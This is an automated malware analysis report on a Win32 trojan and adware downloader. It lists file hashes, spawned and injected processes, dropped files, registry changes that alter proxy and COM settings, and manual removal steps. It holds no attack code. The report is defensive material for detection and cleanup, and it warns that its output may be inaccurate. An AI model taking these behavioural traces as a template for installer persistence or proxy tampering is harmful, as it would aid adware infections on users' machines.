not-a-virus:AdWare.Win32.AdLoad.wvar (Kaspersky), Application.Downloader.RO (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 325175aa976eef22d0cc911fbcfdef64
SHA1: 9ed52ce5a43dc37a4ffd38d410301f4766774b90
SHA256: bf5cf82787dc628f22f7ab2cd8a01573e1c9e56d18bd7a46295a3787da05ba50
SSDeep: 12288:BK2mhAMJ/cPlJHiqQF2qTuxS7R38JK8l924IqPKZ5SRWocW:w2O/GlJHQ1lR38Jpl9XIqYIWDW
Size: 582736 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Hul
Created at: 2012-06-09 16:19:49
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884
The Application injects its code into the following process(es):
Setup__2140_il2.exe:3512
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process Setup__2140_il2.exe:2308 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
The process Setup__2140_il2.exe:3512 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
The process sevensetup.exe:3356 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
The Application deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd584D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (0 bytes)
The process %original file name%.exe:3580 makes changes in the file system.
The Application creates and/or writes to the following file(s):
The Application deletes the following file(s):
The process cpSetup.exe:3976 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
The process run-setup.exe:3884 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)
The Application deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC40.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp (0 bytes)
Registry activity
The process Setup__2140_il2.exe:2308 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\noesis.beryline]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"
[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following registry key(s):
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
[HKCR\noesis.beryline\CurVer]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
[HKCR\noesis.beryline.1\CLSID]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Programmable]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
[HKCR\noesis.beryline]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
[HKCR\noesis.beryline.1]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process Setup__2140_il2.exe:3512 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\noesis.beryline]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3B 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"
[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process sevensetup.exe:3356 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3580 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process cpSetup.exe:3976 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479002472"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process 5827498a25abb_ua.exe:2980 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
The process run-setup.exe:3884 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe,"
Dropped PE files
MD5 | File path |
---|---|
a7318ed2c34bd30f5605e0457734826f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll |
aa91653a46d59ef020669de66aa1fb31 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884 - Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
.rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
.data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
.CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
.rsrc | 192512 | 16656 | 16896 | 3.23905 | aa3a7d7ff24a928d00c7a73daacad998 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 567
01d8f21bdcf3f33cfd44b21cda45bbe1
c9ab4e6c1cfc8ff69ab509756fb4bbb2
a93831bd552da93e3bc3af481883f0cb
8512a38a32d856c43d3d53d1298cdf48
27a2aefa7a8141c7e4d47e4e4e4912dd
62535b8e1ac59d327110d422df7027bc
79f46ad15df03ce32082a5b77e5e8484
19154cb115d8d2adce3b82459253bbb3
1ad22ffca5f98db241175ce6612e1c6c
77653dae69494148cf58389a89a9bd40
9663e05c1cb81a47db70ac43ebb824e1
5e2e21eb1cccabe74a231dc8ee7e45ab
a08d1145184718c8cfb3e674cb51bf37
7ec5648ba6020db188003cab70553f79
b1220d6c3e4fc06ac894d65353fb84e6
b0516e031ff5e44241d3bd16b28983d8
64989f7c46d4103fa833fe61c529a1bf
62379b050ee5ee24b5710d77976e4a4c
